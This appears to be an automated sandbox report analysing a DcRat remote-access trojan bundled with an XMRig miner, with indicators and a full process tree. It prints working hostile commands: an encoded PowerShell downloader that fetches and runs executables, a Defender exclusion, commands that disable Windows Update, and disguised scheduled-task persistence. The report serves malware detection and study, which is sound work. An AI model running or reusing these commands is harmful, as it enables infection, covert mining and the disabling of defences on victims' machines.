dcrat | b82f23ee8617e7ad47d7513fe175e7211564eed5442002927a415d7a035da5cf

Resubmissions

26-12-2022 00:04

221226-acrmcafe2y 10

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:02

26-12-2022 00:01

Analysis

max time kernel
46s
max time network
148s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
26-12-2022 00:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VinyLauncher.exe
Size

160KB
MD5

6260d545ece6e4f04cafc98adf93ff7b
SHA1

5f4f3a9edee92982ba2ff096827fc4da8ecc649a
SHA256

8ddb7cbefe9e072050de7fca61b3db887abfdae8bc4f06ffca6446fac3c8c10f
SHA512

c80d7b4bf465a43b1a6a1168105ad96b866943339ef109283b5105dd44681ed5799e37996ee87bbceccf0f9bf3a9627c97aa660318c1a7e493be61b5e29c722a
SSDEEP

3072:vPw/kZu7QBUiLkFcEdKS2fpp/9eLjEHj9t39cDLztUbkxl:AENBUiLkFcEcS2fppVeLjEHvNcDLzSb

Score

10^/10

dcrat xmrig evasion infostealer miner rat upx

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3396	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4884	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2064	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5020	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4864	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3152	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4212	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5008	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	224	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4640	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	164	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2116	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4684	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2132	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1820	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4632	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2864	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3848	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1116	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2924	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4464	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3424	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3516	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4672	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	960	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4432	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2324	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2688	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2692	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2224	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	656	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2192	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	220	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1800	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	412	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	388	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4644	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1180	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5056	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4892	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4984	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5028	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4856	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4908	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3876	5036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3044	5036	schtasks.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat payload 7 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\checksum.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\checksum.exe	dcrat
behavioral4/memory/4736-440-0x0000000000B60000-0x0000000000D1A000-memory.dmp	dcrat
C:\odt\conhost.exe	dcrat
C:\odt\conhost.exe	dcrat
C:\hypersavesIntoRuntime\savesinto.exe	dcrat
C:\hypersavesIntoRuntime\savesinto.exe	dcrat

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral4/memory/2076-1403-0x00007FF6A5910000-0x00007FF6A6104000-memory.dmp	xmrig
behavioral4/memory/2076-1405-0x00007FF6A5910000-0x00007FF6A6104000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 3796 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

cmd.exelocemsecurity.exe

pid process

3728 cmd.exe
2128 locemsecurity.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
2	3796	powershell.exe

pid	process
3728	cmd.exe
2128	locemsecurity.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral4/memory/2076-1403-0x00007FF6A5910000-0x00007FF6A6104000-memory.dmp	upx
behavioral4/memory/2076-1405-0x00007FF6A5910000-0x00007FF6A6104000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1016 sc.exe
2688 sc.exe
1536 sc.exe
4280 sc.exe
4176 sc.exe
3844 sc.exe
3992 sc.exe
2012 sc.exe
3604 sc.exe
3676 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1016	sc.exe
2688	sc.exe
1536	sc.exe
4280	sc.exe
4176	sc.exe
3844	sc.exe
3992	sc.exe
2012	sc.exe
3604	sc.exe
3676	sc.exe

Creates scheduled task(s) 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
4640	schtasks.exe
3848	schtasks.exe
224	schtasks.exe
2132	schtasks.exe
4432	schtasks.exe
2688	schtasks.exe
2692	schtasks.exe
5020	schtasks.exe
4864	schtasks.exe
5008	schtasks.exe
4452	schtasks.exe
4984	schtasks.exe
388	schtasks.exe
5056	schtasks.exe
4856	schtasks.exe
4884	schtasks.exe
1116	schtasks.exe
3516	schtasks.exe
960	schtasks.exe
656	schtasks.exe
4644	schtasks.exe
4892	schtasks.exe
3188	schtasks.exe
3152	schtasks.exe
4212	schtasks.exe
3396	schtasks.exe
220	schtasks.exe
5028	schtasks.exe
3044	schtasks.exe
164	schtasks.exe
3424	schtasks.exe
4672	schtasks.exe
4464	schtasks.exe
2224	schtasks.exe
4908	schtasks.exe
3876	schtasks.exe
2116	schtasks.exe
4684	schtasks.exe
2864	schtasks.exe
2924	schtasks.exe
2324	schtasks.exe
2192	schtasks.exe
1800	schtasks.exe
412	schtasks.exe
2064	schtasks.exe
1820	schtasks.exe
4632	schtasks.exe
1180	schtasks.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings cmd.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3796 powershell.exe
3796 powershell.exe
3796 powershell.exe
3980 powershell.exe
3980 powershell.exe
3980 powershell.exe
1532 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings	cmd.exe

pid	process
3796	powershell.exe
3796	powershell.exe
3796	powershell.exe
3980	powershell.exe
3980	powershell.exe
3980	powershell.exe
1532	powershell.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

VinyLauncher.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	328	VinyLauncher.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeIncreaseQuotaPrivilege	3796	powershell.exe
Token: SeSecurityPrivilege	3796	powershell.exe
Token: SeTakeOwnershipPrivilege	3796	powershell.exe
Token: SeLoadDriverPrivilege	3796	powershell.exe
Token: SeSystemProfilePrivilege	3796	powershell.exe
Token: SeSystemtimePrivilege	3796	powershell.exe
Token: SeProfSingleProcessPrivilege	3796	powershell.exe
Token: SeIncBasePriorityPrivilege	3796	powershell.exe
Token: SeCreatePagefilePrivilege	3796	powershell.exe
Token: SeBackupPrivilege	3796	powershell.exe
Token: SeRestorePrivilege	3796	powershell.exe
Token: SeShutdownPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeSystemEnvironmentPrivilege	3796	powershell.exe
Token: SeRemoteShutdownPrivilege	3796	powershell.exe
Token: SeUndockPrivilege	3796	powershell.exe
Token: SeManageVolumePrivilege	3796	powershell.exe
Token: 33	3796	powershell.exe
Token: 34	3796	powershell.exe
Token: 35	3796	powershell.exe
Token: 36	3796	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

VinyLauncher.exepowershell.exelocemsecurity.execmd.exe

description	pid	process	target process
PID 328 wrote to memory of 3796	328	VinyLauncher.exe	powershell.exe
PID 328 wrote to memory of 3796	328	VinyLauncher.exe	powershell.exe
PID 3796 wrote to memory of 3980	3796	powershell.exe	powershell.exe
PID 3796 wrote to memory of 3980	3796	powershell.exe	powershell.exe
PID 3796 wrote to memory of 3728	3796	powershell.exe	cmd.exe
PID 3796 wrote to memory of 3728	3796	powershell.exe	cmd.exe
PID 3796 wrote to memory of 3728	3796	powershell.exe	cmd.exe
PID 3796 wrote to memory of 2128	3796	powershell.exe	locemsecurity.exe
PID 3796 wrote to memory of 2128	3796	powershell.exe	locemsecurity.exe
PID 2128 wrote to memory of 1532	2128	locemsecurity.exe	powershell.exe
PID 2128 wrote to memory of 1532	2128	locemsecurity.exe	powershell.exe
PID 3728 wrote to memory of 3868	3728	cmd.exe	WScript.exe
PID 3728 wrote to memory of 3868	3728	cmd.exe	WScript.exe
PID 3728 wrote to memory of 3868	3728	cmd.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\VinyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\VinyLauncher.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZwBpACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHoAcABwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAcgBjACMAPgA7ACIAOwA8ACMAdwBuAGIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBiAG0AYgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AGMAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBkAGgAYgAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAG4AbwBiAG8AZABvAGkAbQBwAG8AcgB0AGEAbgB0AGUALwBkAGkAbgBpAGEAcwBuAGQAaQBhAHMAbgBpAGQALwByAGEAdwAvAGYAOQAyADkANgA4ADkAMQBhADQAYQBmADgANQAxAGYAOAA2AGYAMgA2AGYAMQAwADAAYgBlADgAOQBhADQANABkAGEANgA5ADUAOABmADMALwByAG8AdQB0AGUALgBlAHgAZQAnACwAIAA8ACMAcwBoAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGMAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAGkAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAGgAZQBjAGsAcwB1AG0ALgBlAHgAZQAnACkAKQA8ACMAawBwAHAAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAG4AbwBiAG8AZABvAGkAbQBwAG8AcgB0AGEAbgB0AGUALwBkAGkAbgBpAGEAcwBuAGQAaQBhAHMAbgBpAGQALwByAGEAdwAvAGYAOQAyADkANgA4ADkAMQBhADQAYQBmADgANQAxAGYAOAA2AGYAMgA2AGYAMQAwADAAYgBlADgAOQBhADQANABkAGEANgA5ADUAOABmADMALwBsAGkAbQBtAC4AZQB4AGUAJwAsACAAPAAjAGUAZgB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBuAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABoAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbABvAGMAZQBtAHMAZQBjAHUAcgBpAHQAeQAuAGUAeABlACcAKQApADwAIwB1AHcAYQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHEAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBtAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBoAGUAYwBrAHMAdQBtAC4AZQB4AGUAJwApADwAIwBqAHEAdgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAHAAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcwBpAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbABvAGMAZQBtAHMAZQBjAHUAcgBpAHQAeQAuAGUAeABlACcAKQA8ACMAbABtAHQAIwA+AA=="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#zpp#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#drc#>;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Users\Admin\AppData\Local\Temp\checksum.exe
"C:\Users\Admin\AppData\Local\Temp\checksum.exe"
3⤵
PID:3728

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hypersavesIntoRuntime\kwfdnN25sFO9XG48EjXTqioFlqF9.vbe"
4⤵
PID:3868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hypersavesIntoRuntime\xWSvEstqqDAQFrAa.bat" "
5⤵
PID:1096

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:3604

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:2064

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:4464

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:4684

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:2512

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:924

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:3844

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:3992

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1016

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:3676

C:\Users\Admin\AppData\Local\Temp\locemsecurity.exe
"C:\Users\Admin\AppData\Local\Temp\locemsecurity.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ihnnqfjnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskEditor" } Else { "C:\Program Files\Google\Chrome\updaterload.exe" }
4⤵
PID:5072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#jjwhcvemx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }
4⤵
PID:2164

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:1344

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:652

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:2688

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:1536

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
PID:1512

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
PID:4364

C:\Windows\system32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:2012

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
PID:4720

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
1⤵
PID:3536

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
1⤵
PID:1324

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
1⤵
PID:4184

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
1⤵
PID:4092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUIS" /sc MINUTE /mo 12 /tr "'C:\hypersavesIntoRuntime\SearchUI.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\hypersavesIntoRuntime\SearchUI.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\hypersavesIntoRuntime\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\hypersavesIntoRuntime\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "savesinto" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\savesinto.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\odt\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Local Settings\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\hypersavesIntoRuntime\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\Policies\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Policies\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\security\logs\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\security\logs\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Application Data\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Application Data\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\VideoLAN\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2864

C:\Windows\system32\schtasks.exe
